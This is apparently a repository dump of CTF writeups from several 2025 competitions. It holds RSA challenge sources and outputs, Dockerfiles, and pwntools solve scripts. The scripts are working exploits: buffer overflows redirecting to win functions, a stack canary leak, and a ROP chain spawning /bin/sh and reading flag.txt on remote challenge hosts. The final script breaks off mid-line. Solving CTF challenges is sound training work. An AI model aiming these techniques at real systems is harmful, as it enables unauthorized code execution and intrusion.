-------------------------------------------------------------------------------- 1 | # Squ1rrel CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2708 4 | 5 | 128th place 1578 points 6 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/crypto/easy_rsa/easy_rsa.txt: -------------------------------------------------------------------------------- 1 | n: 26518484190072684543796636642573643429663718007657844401363773206659586306986264997767920520901884078894807042866105584826044096909054367742753454178100533852686155634326578229244464083405472076784252798532101323300927917033985149599262487556178538148122012479094592746981412717431260240328326665253193374956717147239124238669998383943846418315819353858592278242580832695035016713351286816376107787722262574185450560176240134182669922757134881941918668067864082251416681188295948127121973857376227427652243249227143249036846400440184395983449367274506961173876131312502878352761335998067274325965774900643209446005663 2 | e: 65537 3 | c: 14348338827461086677721392146480940700779126717642704712390609979555667316222300910938184262325989361356621355740821450291276190410903072539047611486439984853997473162360371156442125577815817328959277482760973390721183548251315381656163549044110292209833480901571843401260931970647928971053471126873192145825248657671112394111129236255144807222107062898136588067644203143226369746529685617078054235998762912294188770379463390263607054883907325356551707971088954430361996309098504380934167675525860405086306135899933171103093138346158349497350586212612442120636759620471953311221396375007425956203746772190351265066237 -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/crypto/easy_rsa/rsa_easy.py: -------------------------------------------------------------------------------- 1 | import random 2 | from sympy import nextprime, mod_inverse 3 | 4 | 5 | def gen_primes(bit_length, 
diff=2**32): 6 | p = nextprime(random.getrandbits(bit_length)) # NOTE(review): the random module is not a CSPRNG; key material should come from secrets / os.urandom 7 | q = nextprime(p + random.randint(diff//2, diff)) # NOTE(review): q is the first prime above p + [diff//2, diff], so with the default diff=2**32 the two factors differ by roughly 2**32. FIPS 186-4 requires |p - q| > 2**(nlen/2 - 100); a modulus this far below that bound yields to difference-of-squares factoring. Draw p and q independently. 8 | return p, q 9 | 10 | 11 | def gen_keys(bit_length=1024): 12 | p, q = gen_primes(bit_length) 13 | n = p * q 14 | phi = (p - 1) * (q - 1) 15 | 16 | e = 65537 17 | d = mod_inverse(e, phi) # computed but not returned; only (n, e) leaves this function 18 | 19 | return (n, e) 20 | 21 | 22 | def encrypt(message, public_key): 23 | n, e = public_key 24 | message_int = int.from_bytes(message.encode(), 'big') # message bytes taken directly as a big-endian integer 25 | ciphertext = pow(message_int, e, n) # textbook RSA: no padding such as OAEP is applied 26 | return ciphertext 27 | 28 | 29 | if __name__ == "__main__": 30 | public_key = gen_keys() 31 | 32 | message = "FLAG" 33 | ciphertext = encrypt(message, public_key) 34 | 35 | f = open("easy_rsa.txt", "a") # append mode: each run adds another n/e/c block to the file 36 | f.write(f"n: {public_key[0]} \n") 37 | f.write(f"e: {public_key[1]} \n") 38 | f.write(f"c: {ciphertext}") 39 | f.close() 40 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/deja_vu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:24.04 AS base 2 | 3 | FROM pwn.red/jail 4 | 5 | COPY --from=base / /srv 6 | COPY deja-vu /srv/app/run 7 | COPY flag.txt /srv/app/ 8 | ENV JAIL_TIME=60 JAIL_MEM=100M JAIL_CPU=1000 9 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/deja_vu/deja-vu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_04_Squ1rrelCTF25/pwn/deja_vu/deja-vu -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/deja_vu/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./deja-vu", checksec=False) 7 | context.binary = elf 8 | #context.terminal = ["tmux",
"splitw", "-h"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="") 12 | p = remote("20.84.72.194", 5000) 13 | 14 | payload = b"" 15 | payload += b"A" * 0x48 16 | payload += p64(elf.sym["win"]+5) 17 | 18 | p.sendline(payload) 19 | 20 | p.readuntil(b"squ1rrel{") 21 | print("squ1rrel{" + p.readuntil(b"}").decode()) # squ1rrel{w3v3_b33n_h3r3_b3f0r3_n0w_0nt0_b1gger_4nd_better} 22 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/jail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:24.04 AS base 2 | 3 | FROM pwn.red/jail 4 | 5 | COPY --from=base / /srv 6 | COPY prison /srv/app/run 7 | COPY flag.txt /srv/app/ 8 | ENV JAIL_TIME=60 JAIL_MEM=100M JAIL_CPU=1000 9 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/jail/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./prison", checksec=False) 7 | context.binary = elf 8 | context.terminal = ["tmux", "splitw", "-h"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="b *0x00401ad3") 12 | p = remote("20.84.72.194", 5001) 13 | 14 | p.sendlineafter(b"choose your cell (1-6): ", str(-1).encode()) 15 | 16 | p.readuntil(b"cellmate is ") 17 | leak = u64(p.readline()[:-1].ljust(8, b"\x00")) 18 | buf = leak - 0x50 19 | 20 | rop = ROP(elf) 21 | rop.rdi = buf + 0x40 22 | rop.rsi = 0 23 | rop.rax = constants.SYS_execve 24 | rop.raw(rop.find_gadget(['syscall', 'ret'])[0]) 25 | payload = rop.chain() 26 | 27 | POP_RSP = 0x00000000004450f8 #: pop rsp ; ret 28 | rop = ROP(elf) 29 | rop.raw(payload.ljust(0x40, b"A")) 30 | rop.raw(b"/bin/sh\x00") 31 | rop.raw(p64(POP_RSP)) 32 | rop.raw(p64(buf)) 33 | 34 | p.sendlineafter(b"What is your name: ", rop.chain()) 35 | 36 | p.sendline(b"/bin/cat flag.txt") 37 | 
38 | p.readuntil(b"squ1rrel{") 39 | print("squ1rrel{" + p.readuntil(b"}").decode()) # squ1rrel{m4n_0n_th3_rUn_fr0m_NX_pr1s0n!} 40 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/jail/prison: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_04_Squ1rrelCTF25/pwn/jail/prison -------------------------------------------------------------------------------- /2025_04_11_1753CTF25/README.md: -------------------------------------------------------------------------------- 1 | # 1753 CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2639 4 | 5 | 393rd place 100 points 6 | -------------------------------------------------------------------------------- /2025_04_11_1753CTF25/pwn/leakcan/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./leakcan_chall", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("leakcan-25b8ac0dd7fd.tcp.1753ctf.com", 8435) 12 | 13 | p.sendlineafter(b"What's your name", b"A" * 0x58) 14 | p.readline() 15 | p.readline() 16 | canary = u64(b"\x00" + p.recv(7)) 17 | 18 | payload = b"" 19 | payload += b"A" * 0x58 20 | payload += p64(canary) + p64(0) 21 | payload += p64(elf.sym["your_goal"]) 22 | p.sendline(payload) 23 | 24 | p.readuntil(b"1753c{") 25 | print("1753c{" + p.readuntil(b"}").decode()) # 1753c{c4n4ry_1f_th3r35_4_m3m_l34k} 26 | -------------------------------------------------------------------------------- /2025_04_11_1753CTF25/pwn/leakcan/leakcan_chall: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_11_1753CTF25/pwn/leakcan/leakcan_chall -------------------------------------------------------------------------------- /2025_04_12_THCon2K25CTF/README.md: -------------------------------------------------------------------------------- 1 | # THCon 2K25 CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2660 4 | 5 | 141st place 168 points 6 | -------------------------------------------------------------------------------- /2025_04_12_THCon2K25CTF/pwn/gopwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("74.234.198.209", 33243) 7 | 8 | payload = b"" 9 | payload += p8(1) # login 10 | payload += p8(0xff) # second header byte set to 255, presumably a length field (the server source is in gopwn.zip, not shown on this page) 11 | payload += b"A" * 64 # 64 filler bytes 12 | payload += p64(1) # isAdmin. NOTE(review): an 8-byte 1 follows the 64 filler bytes, which suggests the server copies a client-declared length into a fixed 64-byte field next to this flag; the fix is a server-side bound on that length (confirm against the source) 13 | p.sendline(payload) 14 | 15 | payload = b"" 16 | payload += p8(3) # flag 17 | payload += p8(0) 18 | p.sendline(payload) 19 | 20 | p.readuntil(b"THC{") 21 | print("THC{" + p.readuntil(b"}").decode()) # THC{C4r3fUL_w17h_1N7_0v3rf10w_U51n9_C_1N_G0} 22 | -------------------------------------------------------------------------------- /2025_04_12_THCon2K25CTF/pwn/gopwn/gopwn.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_12_THCon2K25CTF/pwn/gopwn/gopwn.zip -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/README.md: -------------------------------------------------------------------------------- 1 | # DawgCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2651 4 | 5 | 311th place 1875 points 6 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_1/output.txt:
-------------------------------------------------------------------------------- 1 | N = 82012538447359821165849738352756467719053530066892750177578020351019136006996881441650616631012602654920370573185549134046659875914860421394782338722082599261391182262036434549525388081948429632803770833590739702562845306267418403878169267641023564108136843672261999376998284926318313315387819024961709097101 2 | e = 65537 3 | ct = 16978597269030388872549064541934623430749704732655891928833779185083334396093332647023718343748730349576361193985691953617733288330780060179716905267988202710452028943623598185277149645724247199640730959820455032298145782015884558972868277752456856802145299858618876838286795962548300080924547387662096543717 4 | 5 | a = 149738867837230590596162146900 6 | b = 743799113257239690478459408953 7 | c = 351498883480247386367558572595 8 | d = 1175770398223262147164171561358 9 | 10 | x = 6836728736678282915469852947219518538837808913380425472016857154639492051766923345186030197640091719641785981050969319578519968972834509899732176840511342124020344870655741074618585883 11 | y = 12203451977234755811396526665700561863946871005728263879373008871704520841041885029745864562375412192520795388389509063064717933869698154304534842876137996238014648925041725231457010083 12 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_1/source.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from sage.all import randint 3 | 4 | p = getPrime(512) 5 | q = getPrime(512) 6 | N = p * q 7 | 8 | e = 0x10001 9 | 10 | m = bytes_to_long(b"DawgCTF{fake_flag}") 11 | 12 | c = pow(m, e, N) 13 | 14 | print("N =", N) 15 | print("e =", e) 16 | print("ct =", c) 17 | print() 18 | 19 | a = randint(0, 2**100) 20 | b = randint(0, 2**100) 21 | c = randint(0, 2**100) 22 | d = randint(0, 2**100) 23 | 24 | x = a * p + b * q 25 | y = c * p + d * q 26 | 27 | print("a 
=", a) 28 | print("b =", b) 29 | print("c =", c) 30 | print("d =", d) 31 | print() 32 | print("x =", x) 33 | print("y =", y) 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_2/chall.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from secret import flag 3 | 4 | # This is my stuff! Don't look at it 5 | p = getPrime(512) 6 | q = getPrime(512) 7 | N = p * q 8 | 9 | e_priv = 0x10001 10 | phi = (p - 1) * (q - 1) 11 | 12 | d_priv = inverse(e_priv, phi) 13 | 14 | m = bytes_to_long(flag) 15 | c = pow(m, e_priv, N) 16 | 17 | # This is your stuff! 18 | e_pub = getPrime(16) 19 | 20 | d_pub = inverse(e_pub, phi) 21 | 22 | print(f"e = {e_pub}") 23 | print(f"d = {d_pub}") 24 | print(f"N = {N}") 25 | print(f"c = {c}") 26 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_2/output.txt: -------------------------------------------------------------------------------- 1 | e = 58271 2 | d = 16314065939355844497428646964774413938010062495984944007868244761330321449198604198404787327825341236658059256072790190934480082681534717838850610633320375625893501985237981407305284860652632590435055933317638416556532857376955427517397962124909869006289022084571993305966362498048396739334756594170449299859 3 | N = 119082667712915497270407702277886743652985638444637188059938681008077058895935345765407160513555112013190751711213523389194925328565164667817570328474785391992857634832562389502866385475392702847788337877472422435555825872297998602400341624700149407637506713864175123267515579305109471947679940924817268027249 4 | c = 
107089582154092285354514758987465112016144455480126366962910414293721965682740674205100222823439150990299989680593179350933020427732386716386685052221680274283469481350106415150660410528574034324184318354089504379956162660478769613136499331243363223860893663583161020156316072996007464894397755058410931262938 5 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/64_bits_in_my_ark_and_texture/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/64_bits_in_my_ark_and_texture/chall -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/clobber/clobber: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/clobber/clobber -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/clobber/ld.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/clobber/ld.so -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/clobber/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/clobber/libc.so.6 -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/interns_project/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | 
#context.log_level = "debug" 6 | elf = ELF("./task", checksec=False) 7 | context.binary = elf 8 | #context.terminal = ["ghostty", "-e"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="") 12 | p = remote("connect.umbccd.net", 20011) 13 | 14 | p.sendline(b"1 2") 15 | 16 | p.readuntil(b"DawgCTF{") 17 | print("DawgCTF{" + p.readuntil(b"}").decode()) # DawgCTF{B@d_P3rm1ssi0ns} 18 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/interns_project/interns'Project: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/interns_project/interns'Project -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/just_parry_lol/frame_trap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/just_parry_lol/frame_trap -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/just_parry_lol/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./frame_trap", checksec=False) 7 | context.binary = elf 8 | #context.terminal = ["ghostty", "-e"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="") 12 | p = remote("connect.umbccd.net", 25699) 13 | 14 | p.sendlineafter(b"Enter your warrior name: ", b"AUTOPARRY") 15 | 16 | p.sendlineafter(b"Enter choice: ", b"5") 17 | p.sendlineafter(b"Enter choice: ", b"5") 18 | 19 | p.readuntil(b"DawgCTF{") 20 | print("DawgCTF{" + p.readuntil(b"}").decode()) # DawgCTF{fr4me_d4ta_m4nipulat10n} 21 | 
-------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/README.md: -------------------------------------------------------------------------------- 1 | # UMDCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2563 4 | 5 | 353rd place 712 points 6 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 AS app 2 | RUN dpkg --add-architecture i386 3 | RUN apt update && apt install -y libc6:i386 4 | FROM pwn.red/jail 5 | 6 | COPY --from=app / /srv 7 | COPY ./gambling /srv/app/run 8 | COPY ./flag.txt /srv/app/flag.txt 9 | 10 | RUN chmod +x /srv/app/run 11 | 12 | ENV JAIL_PORT=1447 JAIL_MEM=16M JAIL_ENV_NUM=5 JAIL_PID=20 JAIL_TIME=600 13 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/Makefile: -------------------------------------------------------------------------------- 1 | gambling: gambling.c 2 | gcc -m32 gambling.c -fno-stack-protector -no-pie -fno-pic -o gambling -O2 3 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/gambling: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_25_UMDCTF25/pwn/gambling2/gambling -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/gambling.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | float rand_float() { 6 | return (float)rand() / RAND_MAX; 7 | } 8 | 9 | void print_money() { 10 | system("/bin/sh"); 11 | } 12 | 13 | void gamble() { 14 | float f[4]; 15 | float target = rand_float(); 16 | printf("Enter 
your lucky numbers: "); 17 | scanf(" %lf %lf %lf %lf %lf %lf %lf", f,f+1,f+2,f+3,f+4,f+5,f+6); /* NOTE(review): f is declared float f[4] (16 bytes), but each %lf stores an 8-byte double and seven of them are written at f..f+6, so bytes 0..31 from f are written: a stack write past the array. The Makefile also passes -fno-stack-protector. Fix: declare float f[7] and read with %f. */ 18 | if (f[0] == target || f[1] == target || f[2] == target || f[3] == target || f[4] == target || f[5] == target || f[6] == target) { /* f[4]..f[6] are read past the end of the 4-element array */ 19 | printf("You win!\n"); 20 | // due to economic concerns, we're no longer allowed to give out prizes. 21 | // print_money(); 22 | } else { 23 | printf("Aww dang it!\n"); 24 | } 25 | } 26 | 27 | int main(void) { 28 | setvbuf(stdout, NULL, _IONBF, 0); 29 | setvbuf(stdin, NULL, _IONBF, 0); 30 | 31 | char buf[20]; 32 | srand(420); /* fixed seed: rand() yields the same sequence on every run */ 33 | while (1) { 34 | gamble(); 35 | getc(stdin); // consume newline 36 | printf("Try again? "); 37 | fgets(buf, 20, stdin); /* bounded: at most 19 characters plus the terminator into buf[20] */ 38 | if (strcmp(buf, "no.\n") == 0) { 39 | break; 40 | } 41 | } 42 | } 43 | 44 | 45 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import struct 4 | from pwn import * 5 | 6 | context.log_level = "debug" 7 | elf = ELF("./gambling") 8 | context.binary = elf 9 | context.terminal = ["ghostty", "-e"] 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="b gamble") 13 | p = remote("challs.umdctf.io", 31005) 14 | 15 | payload = b"" 16 | payload += b"0 0 0 0 0 0 " 17 | payload += str(struct.unpack("